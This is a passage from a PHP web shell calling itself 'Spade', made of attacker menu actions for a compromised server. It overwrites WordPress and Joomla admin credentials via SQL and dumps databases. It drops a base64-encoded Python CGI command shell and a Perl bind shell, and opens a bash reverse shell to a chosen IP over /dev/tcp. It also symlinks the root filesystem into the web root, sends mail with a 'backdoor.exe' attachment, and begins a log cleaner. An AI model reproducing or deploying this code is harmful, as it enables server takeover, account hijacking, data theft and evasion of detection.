  571. $a4s = @mysql_query("UPDATE wp_users SET user_pass ='" . $pwd . "' WHERE ID = 2") or die(mysql_error());
  572. $a4s = @mysql_query("UPDATE wp_users SET user_login ='" . $admin . "' WHERE ID = 3") or die(mysql_error());
  573. $a4s = @mysql_query("UPDATE wp_users SET user_pass ='" . $pwd . "' WHERE ID = 3") or die(mysql_error());
  574. $a4s = @mysql_query("UPDATE wp_users SET user_email ='" . $SQL . "' WHERE ID = 1") or die(mysql_error());
  575. if ($a4s) {
  576. echo "<b class='wenk'> Success!! Now You Can Login To wp-admin</b> ";
  577. }else{ echo "<font color='red'>An Error Occures While Reseting Password!</font>";}
  578. }
  579. echo "
  580. </div></center>";
  581. } elseif ($_GET['do'] == 'jm-reset') {
  582. echo "<center/><br/><form action='' method='post'><h1 class='titulo'>JOOMLA RESET PASSWORD</h1><br>";
  583. if (empty($_POST['pwd'])) {
  584. echo "<FORM method='POST'><table class='tabnet' style='width:300px;'><tr><th colspan='2'>Connect to MySQL </th></tr>
  585. <tr><td>Host: <input style='width:270px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr>
  586. <tr><td>Database: <input style='width:270px;' class='inputz' type='text' name='username' value='db_user' /></td></tr>
  587. <tr><td>DB Password: <input style='width:270px;' class='inputz' type='password' name='password' value='***' /></td></tr>
  588. <tr><td>Username: <input style='width:270px;' class='inputz' name='aadmin' value='admin' /></td></tr>
  589. <tr><td>Password: <input style='width:270px;' class='inputz' name='pawd' value='e10adc3949ba59abbe56e057f20f883e' /></td><tr><td>
  590. <input style='width:270px;' class='inputz' type='submit' value='change!' name='send' /></FORM>
  591. </td></tr> </table><br>";
  592. } else {
  593. $localhost = $_POST['localhost'];
  594. $database = $_POST['database'];
  595. $username = $_POST['username'];
  596. $password = $_POST['password'];
  597. $pwd = $_POST['pawd'];
  598. $admin = $_POST['aadmin'];
  599. @mysql_connect($localhost, $username, $password) or die(mysql_error());
  600. @mysql_select_db($database) or die(mysql_error());
  601. $hash = crypt($pwd);
  602. $SQL = @mysql_query("UPDATE jos_users SET username ='" . $admin . "' WHERE ID = 62") or die(mysql_error());
  603. $SQL = @mysql_query("UPDATE jos_users SET password ='" . $pwd . "' WHERE ID = 62") or die(mysql_error());
  604. $SQL = @mysql_query("UPDATE jos_users SET username ='" . $admin . "' WHERE ID = 63") or die(mysql_error());
  605. $SQL = @mysql_query("UPDATE jos_users SET password ='" . $pwd . "' WHERE ID = 63") or die(mysql_error());
  606. $SQL = @mysql_query("UPDATE jos_users SET username ='" . $admin . "' WHERE ID = 64") or die(mysql_error());
  607. $SQL = @mysql_query("UPDATE jos_users SET password ='" . $pwd . "' WHERE ID = 64") or die(mysql_error());
  608. $SQL = @mysql_query("UPDATE jos_users SET username ='" . $admin . "' WHERE ID = 65") or die(mysql_error());
  609. $SQL = @mysql_query("UPDATE jos_users SET password ='" . $pwd . "' WHERE ID = 65") or die(mysql_error());
  610. if ($SQL) {
  611. echo "<b class='wenk'>Success : New Password >>> - (123456)</b>";
  612. }else{ echo "<font color='red'>An Error Occures While Reseting Password!</font>";}
  613. }
  614. echo "</div></center>";
  615. } elseif ($_GET['do'] == 'dbdump') {
  616. echo $head . '<center><h1 class="titulo">DATABASE DUMP</h1><br><p align="center">';
  617. echo '<form action method=post>
  618. <table width=371 class=tabnet >
  619. <tr>
  620. <td>Server </td>
  621. <td><input class="inputz" type=text name=server value="localhost" size=52></td></tr><tr>
  622. <td>Username</td>
  623. <td><input class="inputz" type=text name=username size=52></td></tr><tr>
  624. <td>Password</td>
  625. <td><input class="inputz" type=text name=password size=52></td></tr><tr>
  626. <td>DataBase Name</td>
  627. <td><input class="inputz" type=text name=dbname size=52></td></tr>
  628. <tr>
  629. <td>DB Type </td>
  630. <td><form method=post action="' . $me . '">
  631. <select class="inputz" name=method>
  632. <option value="gzip">Gzip</option>
  633. <option value="sql">Sql</option>
  634. </select>
  635. <input class="inputzbut" type=submit value=" Dump! " ></td></tr>
  636. </form></center></table>';
  637. if ($_POST['username'] && $_POST['dbname'] && $_POST['method']) {
  638. $date = date("Y-m-d");
  639. $dbserver = $_POST['server'];
  640. $dbuser = $_POST['username'];
  641. $dbpass = $_POST['password'];
  642. $dbname = $_POST['dbname'];
  643. $file = "Dump-$dbname-$date";
  644. $method = $_POST['method'];
  645. if ($method == 'sql') {
  646. $file = "Dump-$dbname-$date.sql";
  647. $fp = fopen($file, "w");
  648. } else {
  649. $file = "Dump-$dbname-$date.sql.gz";
  650. $fp = gzopen($file, "w");
  651. }
  652. function write($data) {
  653. global $fp;
  654. if ($_POST['method'] == 'ssql') {
  655. fwrite($fp, $data);
  656. } else {
  657. gzwrite($fp, $data);
  658. }
  659. }
  660. mysql_connect($dbserver, $dbuser, $dbpass);
  661. mysql_select_db($dbname);
  662. $tables = mysql_query("SHOW TABLES");
  663. while ($i = mysql_fetch_array($tables)) {
  664. $i = $i['Tables_in_' . $dbname];
  665. $create = mysql_fetch_array(mysql_query("SHOW CREATE TABLE " . $i));
  666. write($create['Create Table'] . ";nn");
  667. $sql = mysql_query("SELECT * FROM " . $i);
  668. if (mysql_num_rows($sql)) {
  669. while ($row = mysql_fetch_row($sql)) {
  670. foreach ($row as $j => $k) {
  671. $row[$j] = "'" . mysql_escape_string($k) . "'";
  672. }
  673. write("INSERT INTO $i VALUES(" . implode(",", $row) . ");n");
  674. }
  675. }
  676. }
  677. if ($method == 'ssql') {
  678. fclose($fp);
  679. } else {
  680. gzclose($fp);
  681. }
  682. header("Content-Disposition: attachment; filename=" . $file);
  683. header("Content-Type: application/download");
  684. header("Content-Length: " . filesize($file));
  685. flush();
  686. $fp = fopen($file, "r");
  687. while (!feof($fp)) {
  688. echo fread($fp, 65536);
  689. flush();
  690. }
  691. fclose($fp);
  692. }
  693. }elseif($_GET['do'] == 'hash'){
  694. $submit = $_POST['enter'];
  695. if (isset($_POST['password'])) {
  696. $pass = $_POST['password']; // password
  697. $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
  698. $hash = md5($pass); // md5 hash #1
  699. $md4 = hash("md4", $pass);
  700. $hash_md5 = md5($salt . $pass); // md5 hash with salt #2
  701. $hash_md5_double = md5(sha1($salt . $pass)); // md5 hash with salt & sha1 #3
  702. $hash1 = sha1($pass); // sha1 hash #4
  703. $sha256 = hash("sha256", $text);
  704. $hash1_sha1 = sha1($salt . $pass); // sha1 hash with salt #5
  705. $hash1_sha1_double = sha1(md5($salt . $pass)); // sha1 hash with salt & md5 #6
  706.  
  707. }
  708. echo '<center><h1 class="titulo">PASSWORD HASH</h1><br><form action="" method="post"><b><table>';
  709. echo '<tr><td><b>Enter the word you want to encrypt:</b></td>';
  710. echo '<td><input class="inputz" type="text" name="password" size="40" />';
  711. echo '<input class="inputzbut" type="submit" name="enter" value="hash" />';
  712. echo '</td></tr><br>';
  713. echo '<tr><th colspan="2">Hash Result</th></center></tr>';
  714. echo '<tr><td>Original Password</td><td><input class=inputz type=text size=50 value="' . $pass . '" readonly ></td></tr>';
  715. echo '<tr><td>MD5</td><td><input class=inputz type=text size=50 value="' . $hash . '" readonly></td></tr>';
  716. echo '<tr><td>MD4</td><td><input class=inputz type=text size=50 value="' . $md4 . '" readonly></td></tr>';
  717. echo '<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value="' . $hash_md5 . '" readonly></td></tr>';
  718. echo '<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value="' . $hash_md5_double . '" readonly></td></tr>';
  719. echo '<tr><td>Sha1</td><td><input class=inputz type=text size=50 value="' . $hash1 . '" readonly ></td></tr>';
  720. echo '<tr><td>Sha256</td><td><input class=inputz type=text size=50 value="' . $sha256 . '" readonly></td></tr>';
  721. echo '<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value="' . $hash1_sha1 . '" readonly></td></tr>';
  722. echo '<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value="' . $hash1_sha1_double . '" readonly></td></tr></table></center>';
  723. }elseif($_GET['do'] == "hashid"){
  724. if (isset($_POST['hash'])) {
  725. $hash = $_POST['hash'];
  726. if (strlen($hash) == 32) {
  727. $hashresult = "MD5 Hash";
  728. } elseif (strlen($hash) == 40) {
  729. $hashresult = "SHA-1 Hash/ /MySQL5 Hash";
  730. } elseif (strlen($hash) == 13) {
  731. $hashresult = "DES(Unix) Hash";
  732. } elseif (strlen($hash) == 16) {
  733. $hashresult = "MySQL Hash / /DES(Oracle Hash)";
  734. } elseif (strlen($hash) == 41) {
  735. $GetHashChar = substr($hash, 40);
  736. if ($GetHashChar == "*") {
  737. $hashresult = "MySQL5 Hash";
  738. }
  739. } elseif (strlen($hash) == 64) {
  740. $hashresult = "SHA-256 Hash";
  741. } elseif (strlen($hash) == 96) {
  742. $hashresult = "SHA-384 Hash";
  743. } elseif (strlen($hash) == 128) {
  744. $hashresult = "SHA-512 Hash";
  745. } elseif (strlen($hash) == 34) {
  746. if (strstr($hash, '$1$')) {
  747. $hashresult = "MD5(Unix) Hash";
  748. }
  749. } elseif (strlen($hash) == 37) {
  750. if (strstr($hash, '$apr1$')) {
  751. $hashresult = "MD5(APR) Hash";
  752. }
  753. } elseif (strlen($hash) == 34) {
  754. if (strstr($hash, '$H$')) {
  755. $hashresult = "MD5(phpBB3) Hash";
  756. }
  757. } elseif (strlen($hash) == 34) {
  758. if (strstr($hash, '$P$')) {
  759. $hashresult = "MD5(Wordpress) Hash";
  760. }
  761. } elseif (strlen($hash) == 39) {
  762. if (strstr($hash, '$5$')) {
  763. $hashresult = "SHA-256(Unix) Hash";
  764. }
  765. } elseif (strlen($hash) == 39) {
  766. if (strstr($hash, '$6$')) {
  767. $hashresult = "SHA-512(Unix) Hash";
  768. }
  769. } elseif (strlen($hash) == 24) {
  770. if (strstr($hash, '==')) {
  771. $hashresult = "MD5(Base-64) Hash";
  772. }
  773. } else {
  774. $hashresult = "<font color='red'>Hash type not found</font>";
  775. }
  776. } else {
  777. $hashresult = "<font color='gold'>No Hash Entered</font>";
  778. }
  779. echo '
  780. <center><br><h1 class="titulo">HASH IDENTIFIER</h1><br>
  781. <form action="" method="POST">
  782. <tr>
  783. <table class="tabnet">
  784. <tr class="optionstr"><B><td>Enter Hash</td></b><td>:</td> <td><input type="text" name="hash" size="60" class="inputz" /></td><td><input type="submit" class="inputzbut" name="gethash" value="Identify Hash" /></td></tr>
  785. <tr class="optionstr"><b><td>Result</td><td>:</td><td><font color="lime">'. $hashresult .'</font></td></tr></b>
  786. </table></tr></form>
  787. </center>';
  788. }elseif($_GET['do'] == 'python'){
  789. echo "<center/><br/><h1 class='titulo'>PYTHON BYPASS EXPLOIT</h1><br>";
  790. mkdir('spade_python', 0755);
  791. chdir('spade_python');
  792. $kokdosya = ".htaccess";
  793. $dosya_adi = "$kokdosya";
  794. $dosya = fopen($dosya_adi, 'w') or die("Not Writable!");
  795. $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .izo\nAddHandler cgi-script .izo\nAddHandler cgi-script .izo";
  796. fwrite($dosya, $metin);
  797. fclose($dosya);
  798. $pythonp = "IyEvdXNyL2Jpbi9weXRob24KIyAwNy0wNy0wNAojIHYxLjAuMAoKIyBjZ2ktc2hlbGwucHkKIyBB
  799. IHNpbXBsZSBDR0kgdGhhdCBleGVjdXRlcyBhcmJpdHJhcnkgc2hlbGwgY29tbWFuZHMuCgoKIyBD
  800. b3B5cmlnaHQgTWljaGFlbCBGb29yZAojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQg
  801. cmVsaWNlbnNlIHRoaXMgY29kZS4KCiMgTm8gd2FycmFudHkgZXhwcmVzcyBvciBpbXBsaWVkIGZv
  802. ciB0aGUgYWNjdXJhY3ksIGZpdG5lc3MgdG8gcHVycG9zZSBvciBvdGhlcndpc2UgZm9yIHRoaXMg
  803. Y29kZS4uLi4KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISEKCiMgRS1tYWlsIG1pY2hhZWwgQVQg
  804. Zm9vcmQgRE9UIG1lIERPVCB1awojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsv
  805. YXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbAoKIiIiCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8g
  806. ZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLgoiIiIKIyMjIyMjIyMjIyMjIyMjIyMjIyMj
  807. IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIEltcG9ydHMKdHJ5
  808. OgogICAgaW1wb3J0IGNnaXRiOyBjZ2l0Yi5lbmFibGUoKQpleGNlcHQ6CiAgICBwYXNzCmltcG9y
  809. dCBzeXMsIGNnaSwgb3MKc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQKZnJvbSB0aW1lIGltcG9ydCBz
  810. dHJmdGltZQppbXBvcnQgdHJhY2ViYWNrCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPCmZy
  811. b20gdHJhY2ViYWNrIGltcG9ydCBwcmludF9leGMKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
  812. IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBjb25zdGFudHMKCmZvbnRs
  813. aW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQt
  814. c2l6ZToxMnB0OyI+Jwp2ZXJzaW9uc3RyaW5nID0gJ1ZlcnNpb24gMS4wLjAgN3RoIEp1bHkgMjAw
  815. NCcKCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToKICAgIHNjcmlwdG5hbWUg
  816. PSBvcy5lbnZpcm9uWyJTQ1JJUFRfTkFNRSJdCmVsc2U6CiAgICBzY3JpcHRuYW1lID0gIiIKCk1F
  817. VEhPRCA9ICciUE9TVCInCgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
  818. IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMgUHJpdmF0ZSBmdW5jdGlvbnMgYW5kIHZhcmlhYmxl
  819. cwoKZGVmIGdldGZvcm0odmFsdWVsaXN0LCB0aGVmb3JtLCBub3RwcmVzZW50PScnKToKICAgICIi
  820. IlRoaXMgZnVuY3Rpb24sIGdpdmVuIGEgQ0dJIGZvcm0sIGV4dHJhY3RzIHRoZSBkYXRhIGZyb20g
  821. aXQsIGJhc2VkIG9uCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFs
  822. dWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLgogICAgKGUu
  823. Zy4gdG8gcmV0dXJuIE5vbmUgc28geW91IGNhbiB0ZXN0IGZvciBtaXNzaW5nIGtleXdvcmRzIC0g
  824. d2hlcmUgJycgaXMgYSB2YWxpZCBhbnN3ZXIgYnV0IHRvIGhhdmUgdGhlIGZpZWxkIG1pc3Npbmcg
  825. aXNuJ3QuKSIiIgogICAgZGF0YSA9IHt9CiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0OgogICAg
  826. ICAgIGlmIG5vdCB0aGVmb3JtLmhhc19rZXkoZmllbGQpOgogICAgICAgICAgICBkYXRhW2ZpZWxk
  827. XSA9IG5vdHByZXNlbnQKICAgICAgICBlbHNlOgogICAgICAgICAgICBpZiAgdHlwZSh0aGVmb3Jt
  828. W2ZpZWxkXSkgIT0gdHlwZShbXSk6CiAgICAgICAgICAgICAgICBkYXRhW2ZpZWxkXSA9IHRoZWZv
  829. cm1bZmllbGRdLnZhbHVlCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICB2YWx1ZXMg
  830. PSBtYXAobGFtYmRhIHg6IHgudmFsdWUsIHRoZWZvcm1bZmllbGRdKSAgICAgIyBhbGxvd3MgZm9y
  831. IGxpc3QgdHlwZSB2YWx1ZXMKICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdmFsdWVzCiAg
  832. ICByZXR1cm4gZGF0YQoKCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1z
  833. aGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+CjxCT0RZPjxDRU5URVI+
  834. CjxIMT5XZWxjb21lIHRvIGNnaS1zaGVsbC5weSAtIDxCUj5hIFB5dGhvbiBDR0k8L0gxPgo8Qj48
  835. ST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPgoiIiIrZm9udGxpbmUgKyJWZXJzaW9uIDogIiArIHZl
  836. cnNpb25zdHJpbmcgKyAiIiIsIFJ1bm5pbmcgb24gOiAiIiIgKyBzdHJmdGltZSgnJUk6JU0gJXAs
  837. ICVBICVkICVCLCAlWScpKycuPC9DRU5URVI+PEJSPicKCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIg
  838. Q29tbWFuZDwvSDI+CjxGT1JNIE1FVEhPRD1cIiIiIiArIE1FVEhPRCArICciIGFjdGlvbj0iJyAr
  839. IHNjcmlwdG5hbWUgKyAiIiJcIj4KPGlucHV0IG5hbWU9Y21kIHR5cGU9dGV4dD48QlI+CjxpbnB1
  840. dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+CjwvRk9STT48QlI+PEJSPiIiIgpib2R5
  841. ZW5kID0gJzwvQk9EWT48L0hUTUw+JwplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5n
  842. IFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
  843. IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBtYWluIGJvZHkgb2YgdGhlIHNj
  844. cmlwdAoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIHByaW50ICJDb250ZW50LXR5cGU6
  845. IHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyCiAg
  846. ICBwcmludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBzbyBpcyB0aGlzIGJs
  847. YW5rIGxpbmUKICAgIGZvcm0gPSBjZ2kuRmllbGRTdG9yYWdlKCkKICAgIGRhdGEgPSBnZXRmb3Jt
  848. KFsnY21kJ10sZm9ybSkKICAgIHRoZWNtZCA9IGRhdGFbJ2NtZCddCiAgICBwcmludCB0aGVmb3Jt
  849. aGVhZAogICAgcHJpbnQgdGhlZm9ybQogICAgaWYgdGhlY21kOgogICAgICAgIHByaW50ICc8SFI+
  850. PEJSPjxCUj4nCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJS
  851. PicKICAgICAgICBwcmludCAnUmVzdWx0IDogPEJSPjxCUj4nCiAgICAgICAgdHJ5OgogICAgICAg
  852. ICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkKICAgICAg
  853. ICAgICAgY2hpbGRfc3RkaW4uY2xvc2UoKQogICAgICAgICAgICByZXN1bHQgPSBjaGlsZF9zdGRv
  854. dXQucmVhZCgpCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpCiAgICAgICAgICAgIHBy
  855. aW50IHJlc3VsdC5yZXBsYWNlKCdcbicsICc8QlI+JykKCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlv
  856. biwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNv
  857. bW1hbmQKICAgICAgICAgICAgcHJpbnQgZXJyb3JtZXNzCiAgICAgICAgICAgIGYgPSBTdHJpbmdJ
  858. TygpCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpCiAgICAgICAgICAgIGEgPSBmLmdldHZh
  859. bHVlKCkuc3BsaXRsaW5lcygpCiAgICAgICAgICAgIGZvciBsaW5lIGluIGE6CiAgICAgICAgICAg
  860. ICAgICBwcmludCBsaW5lCgogICAgcHJpbnQgYm9keWVuZAoKCiIiIgpUT0RPL0lTU1VFUwoKCgpD
  861. SEFOR0VMT0cKCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wCkEgdmVyeSBiYXNpYyBzeXN0
  862. ZW0gZm9yIGV4ZWN1dGluZyBzaGVsbCBjb21tYW5kcy4KSSBtYXkgZXhwYW5kIGl0IGludG8gYSBw
  863. cm9wZXIgJ2Vudmlyb25tZW50JyB3aXRoIHNlc3Npb24gcGVyc2lzdGVuY2UuLi4KIiIi";
  864. $file = fopen("python.izo", "w+");
  865. $write = fwrite($file, base64_decode($pythonp));
  866. fclose($file);
  867. chmod("python.izo", 0755);
  868. echo " <iframe src=spade_python/python.izo width=96% height=76% frameborder=0></iframe></center>
  869. </div>";
  870. }elseif($_GET['do'] == 'mail'){
  871. echo "<center><h1 class=titulo>MAILER</h1><br><table>
  872. <form method=post>
  873. <tr><td>Mail to:: </td><td><input type=email name='mailto' placeholder='your@email.com' ></td></tr>
  874. <tr><td>From :: </td><td><input type=email name='from' placeholder='spade@localhost.com' ></td></tr>
  875. <tr><td>Subject:: </td><td><input type=text name='subject' placeholder='Please!, Patch your System'></td></tr>
  876. <tr><td>Attach File:: </td><td><input type=text name='file' placeholder='".getcwd()."backdoor.exe'></td></tr>
  877. <tr><td>Count Mail:: </td><td><input type=text name='count' placeholder='1'></td></tr><br>
  878. Message::<br>
  879. <tr><textarea rows='6' cols='60' name='content'>Hi Admin!</textarea></tr><tr><td><input type=submit name='send' value='Send'></td></tr>
  880. </table>";
  881. if(isset($_POST['mailto']) && (isset($_POST['send']))){
  882. $mailto = $_POST['mailto'];
  883. $from = $_POST['from'];
  884. $subject = $_POST['subject'];
  885. $file = $_POST['file'];
  886. $count = (int)$_POST['count'];
  887. $mail_content = $_POST['content'];
  888. if(filter_var($mailto, FILTER_VALIDATE_EMAIL)){
  889. if(!empty($file)&&@is_file($file)){
  890. $filez = $file;
  891. $content = readfile($filez);
  892. $content = chunk_split(__ZW5jb2Rlcg($content));
  893. $uid = md5(uniqid(time()));
  894. $filename = basename($filez);
  895. $headers = "From: ".$from." <".$from.">\r\n";
  896. $headers .= "To: " . $mailto. " ( ".$mailto." ) \r\n";
  897. $headers .= "Reply-To: ".$from."\r\n";
  898. $headers .= "Content-Type: multipart/mixed;
  899. boundary=\"".$uid."\"\r\n\r\n";
  900. $headers .= 'MIME-Version: 1.0' . "\r\n";
  901. $headers .= 'X-Mailer: php' . "\r\n";
  902. $mail_content = "--".$uid."\r\n";
  903. $mail_content .= "Content-type:text/plain;
  904. charset=iso-8859-1\r\n";
  905. $mail_content .= "Content-Transfer-Encoding: 7bit\r\n\r\n";
  906. $mail_content .= $mail_content."\r\n\r\n";
  907. $mail_content .= "--".$uid."\r\n";
  908. $mail_content .= "Content-Type: application/octet-stream;
  909. name=\"".$filename."\"\r\n";
  910. $mail_content .= "Content-Transfer-Encoding: base64\r\n";
  911. $mail_content .= "Content-Disposition: attachment;
  912. filename=\"".$filename."\"\r\n\r\n";
  913. $mail_content .= $content."\r\n\r\n";
  914. $mail_content .= "--".$uid."--";
  915. }else{
  916. $headers = "From: " . $from. " ( ".$from." ) \r\n";
  917. $headers .= "To: " . $mailto. " ( ".$mailto." ) \r\n";
  918. $headers .= 'Reply-To: '.$from.'' . "\r\n";
  919. $headers .= 'Content-type: text/html;
  920. charset=utf-8' . "\r\n";
  921. $headers .= 'MIME-Version: 1.0' . "\r\n";
  922. $headers .= 'X-Mailer: php' . "\r\n";
  923. }
  924. if(empty($count)||$count<1)$count=1;
  925. if(!empty($from)){
  926. for($i=1;$i<=$count;$i++){
  927. if(@mail($mailto,$subject,$mail_content,$headers))echo("<font color=lime>Sent to :: ".$mailto."</font><br>");
  928. }
  929. }else{ echo "<font color=red>Invalid \"From\" Email!</font>"; }
  930. }else{ echo "<font color=red>Invalid Email!</font>"; }
  931. }
  932. echo "</center>";
  933. } elseif($_GET['do'] == 'network') {
  934. echo "<center>
  935. <h1 class='titulo'>BACK CONNECT</h1><br><form method='post'>
  936. <u>Bind Port:</u> <br>
  937. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  938. <input type='submit' name='sub_bp' value='>>'>
  939. </form>
  940. <form method='post'>
  941. <u>Back Connect:</u> <br>
  942. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  943. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  944. <input type='submit' name='sub_bc' value='>>'>
  945. </form></center>";
  946. if(isset($_POST['sub_bc'])) {
  947. $ip = $_POST['ip_bc'];
  948. $port = $_POST['port_bc'];
  949. exe("/bin/bash -i >& /dev/tcp/$ip/$port 0>&1");
  950. }
  951. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  952. if(isset($_POST['sub_bp'])) {
  953. $f_bp = fopen("/tmp/bp.pl", "w");
  954. fwrite($f_bp, base64_decode($bind_port_p));
  955. fclose($f_bp);
  956.  
  957. $port = $_POST['port_bind'];
  958. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  959. sleep(1);
  960. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  961. unlink("/tmp/bp.pl");
  962. }
  963. }elseif ($_GET['do'] == 'vhost') {
  964. echo "<center><h1 class='titulo'>BYPASS VHOST</h1></center>";
  965. echo "<form method='POST' action=''>";
  966. echo "<center><input type='submit' value='Bypass it' name='Colii'></center>";
  967. if (isset($_POST['Colii'])) {
  968. system('ln -s / Spade.txt');
  969. $fvckem = 'T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzCkRpcmVjdG9yeUluZGV4IHNwYWRlLmh0bQpBZGRUeXBlIHR4dCAucGhwCkFkZEhhbmRsZXIgdHh0IC5waHA=';
  970. $file = fopen(".htaccess", "w+");
  971. $write = fwrite($file, base64_decode($fvckem));
  972. $Bok3p = symlink("/", "Spade.txt");
  973. $rt = "<br><a href=Spade.txt TARGET='_blank'><font color=#ff0000 size=2 face='Courier New'><b>Bypassed Successfully</b></font></a>";
  974. echo "<br><br><b>Done.. !</b><br><br>Check link given below for / folder symlink <br>$rt</center>";
  975. }
  976. echo "</form>";
  977. }elseif($_GET['do'] == 'clear_logs'){
  978. echo "<center> <h1 class='titulo'>LOG CLEANER</h1><br>";
